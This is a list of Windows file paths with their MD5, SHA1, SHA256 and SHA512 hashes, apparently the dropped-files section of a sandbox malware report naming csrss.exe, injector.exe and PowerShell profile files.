SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 c0c8ca691935cdf1a3e382fbdb197cc2
SHA1 cf359727fa7d7e043d4d5edd2a7701ac16e270e1
SHA256 0d6cedfae688b28f3ec53550d549465be5cf6b9e32d56e7004917d55a0f7615d
SHA512 60814fe27a14fab13468b923bfd087c3fc7a89169f33a37f005aed977cf12540c7c51f0751e87be3f63af478d3581e3c9cb9a7c2d108e5be9b2b02a88d980530

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 7363ded56cc8c4fdc26e986428b3ff57
SHA1 2bc1cc5db0bc6bfbe19442c4c91acc2ef911e1df
SHA256 ca8b78e8498dc6ae407a438e68c64d62b4f88d9b1765a20100b6738fe47a93d6
SHA512 e8b98a74b07846091e9e3a6bf58673733b6c4c0567f37b10df5590ac919fd216fc16af757d2d61cda33b27314f712a7beee19437c577e494d24c812c00e882e8

C:\Windows\rss\csrss.exe

MD5 d122f827c4fc73f9a06d7f6f2d08cd95
SHA1 cd1d1dc2c79c0ee394b72efc264cfd54d96e1ee5
SHA256 b7a6dcfdd64173ecbcef562fd74aee07f3639fa863bd5740c7e72ddc0592b4fc
SHA512 8755979d7383d6cb5e7d63798c9ca8b9c0faeec1fe81907fc75bbbb7be6754ab7b5a09a98492a27f90e3f26951b6891c43d8acd21414fb603cd86a4e10dac986

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 a1a6e00ad86306a7e3cf5dfbdc85d668
SHA1 648262ea8c7f0e0776f4148f52c2e08e5be62702
SHA256 906e75e19d56b8ad5e81772fb789ffb2d39dee2cea68870bb2fc60e061d2ac0c
SHA512 c6b77c9499fdefdd132e8b25e4fdefed55a3b5509fa6f7b819a01eafb568b2da26cc5f1b654946be0b5507436dacae3e4e1fc0ed65c8721458a398d60a1b3622

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 9a1fb9e61d5edea2f4624ac4dbc7fdb1
SHA1 881abd49ef4742faf67bc0ebda2114afe8754975
SHA256 b402713d34ead6b4cf6fc538478138de5432c79cabbda2fd60fb1d476755e046
SHA512 721ed59f6b2210bb2e1e9d4dc2b3019761442e36d70ef1be4a5eefabe568274c29180f9db8d03255b2b6a67122989b84058ac92f7b6e71077dd6308f643bb8b0

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 64fed1db05d52eac09cd954ce44867b9
SHA1 65f2e6e551d50e512160945d13df310f0e692952
SHA256 8ffb678a94cad10d604ed312fc31a02fae298e900c0a629f7e58b1ee4d56d33d
SHA512 1a0c0bab11e93f7dbf0a66c9ead6b55b2304caba0407d7d8f9fcee227405c0f3e87efcda155033a117967cbab475ab7bdfebfa7565db1db3be88ad44ce9bd9c5

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 a0ab2251d3ceb1349776ff3642e807bb
SHA1 3a3c78a26b87b9cfc0b9605e94e03eccb288426d
SHA256 5b1fffd5f6d7e45458ced266a096de2d1b9af84f71c0bc97b0d2b64a317ae391
SHA512 bb11a89847dc5e9c874453df71dfc8089bbe46c2f7b5079543eb0a686fd4c3dcf468a0aba4f156d6fe193d15552a55b9d1cba58fa82cb59e863c4cda82159ea2